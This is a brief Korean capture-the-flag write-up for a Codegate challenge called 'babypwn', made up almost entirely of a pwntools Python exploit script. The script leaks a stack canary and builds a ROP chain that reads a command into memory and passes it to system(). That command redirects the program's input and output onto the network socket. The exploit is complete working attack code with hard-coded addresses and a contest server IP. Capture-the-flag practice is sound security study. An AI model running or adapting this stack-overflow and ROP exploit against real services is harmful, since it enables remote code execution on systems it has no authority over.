
babypwn



전형적인 bof 문제다. ROP를 사용해서 system을 실행시키고


소켓으로 fd를 redirect 시켜서 플래그를 확인하면 됨


아래는 Exploit.py



from pwn import *

# Connection to the challenge service.  The first pair points at a local
# test instance; the contest endpoint is kept below, commented out.
HOST, PORT = "192.168.0.14", 9191  # local
# HOST, PORT = "110.10.212.130", 8888  # codegate
con = remote(HOST, PORT)

def dummy():
	"""Read and discard 276 bytes from the connection.

	Not called anywhere in this script; kept as a helper.
	"""
	skip = 276
	con.recvn(skip)

def canary_leak():
	"""Leak the 4-byte value sitting right after the 40-byte message buffer.

	Drives the service menu to option 1, sends 40 filler bytes (sendline
	appends a newline), then reads back 40 bytes -- presumably the echoed
	message -- followed by 4 more bytes, which the script treats as the
	stack canary.  Returns that value decoded as a little-endian integer.
	"""
	print("[*] Canary Leak")
	con.recvuntil("3. Exit\n")
	con.recvuntil("===============================\n")
	con.send("1\x00")
	con.recvuntil("Input Your Message : ")
	con.sendline("A" * 40)
	con.recvn(40)  # bytes that come back for the 40 filler bytes
	raw = con.recvn(4)  # the 4 bytes immediately after them
	value = u32(raw)  # little-endian decode (same as reversing and hex-parsing)
	print("canary : " + hex(value))
	return value

def ROP():
	"""Leak the canary, send the ROP payload, then hand the socket to the user.

	Every send/recv below is paired with a specific service prompt, so the
	stage order must not change.  All addresses are hard-coded for this
	challenge binary and will not transfer to another build.
	"""
	canary = canary_leak()
	print "[*] ROP Stage"

	# Addresses from the challenge binary (fixed values, so presumably no
	# PIE -- TODO confirm against the ELF before reuse).
	worker = 0x08048A71  # not referenced anywhere in the chain below
	pop3ret = 0x8048eec  # gadget placed as recv()'s return address
	system_plt = 0x8048620
	recv_plt = 0x80486e0
	bss = 0x804b1b4  # scratch area the command string is read into

	# Command string that the recv() in the chain writes to bss and that
	# system() later runs; fd 4 matches the socket descriptor passed to recv().
	gadget = "/bin/ls 0>&4 1>&4\x00"

	print "[*] Pre-Payload Send"
	con.recvuntil("3. Exit\n")
	con.recvuntil("===============================\n")
	con.sendline("1")
	con.recvuntil("Input Your Message : ")

	# Frame layout as the script assumes it: 40 bytes of message buffer,
	# the canary, 12 bytes of padding (presumably saved registers/EBP),
	# then the saved return address where the chain starts.
	payload  = ""
	payload += "A" * 40
	payload += p32(canary)
	payload += "B" * 12
	
	# recv(4, bss, len(gadget), 0), returning into pop3ret
	payload += p32(recv_plt)
	payload += p32(pop3ret)
	payload += p32(0x04) # socket
	payload += p32(bss)
	payload += p32(len(gadget))
	payload += p32(0x00)
	# system(bss); 0x41414141 is a throwaway return address
	payload += p32(system_plt)
	payload += p32(0x41414141)
	payload += p32(bss)

	con.sendline(payload)

	# Write the message a second time with exactly 41 bytes, the last one
	# NUL.  send() rather than sendline() so no newline follows the NUL;
	# presumably this restores the canary's zero low byte that the earlier
	# sendline's newline overwrote -- not verifiable from this script alone.
	print "[*] Canary Null Inject"
	con.recvuntil("3. Exit\n")
	con.recvuntil("===============================\n")
	con.sendline("1")
	con.recvuntil("Input Your Message : ")

	payload  = ""
	payload += "A" * 40
	payload += "\x00"

	con.send(payload)

	# Menu option 3 (Exit) presumably returns from the overwritten frame,
	# which starts the chain.  The menu text is printed for visibility.
	print "[*] Triggering"
	con.recvuntil("3. Exit\n")
	print con.recvuntil("===============================\n")
	con.sendline("3") # triggering

	# Supplies the command string to the recv() call in the chain
	# (sendline adds one extra newline beyond len(gadget)).
	con.sendline(gadget)

	con.interactive()

ROP()  # runs on import/execution; there is no __main__ guard

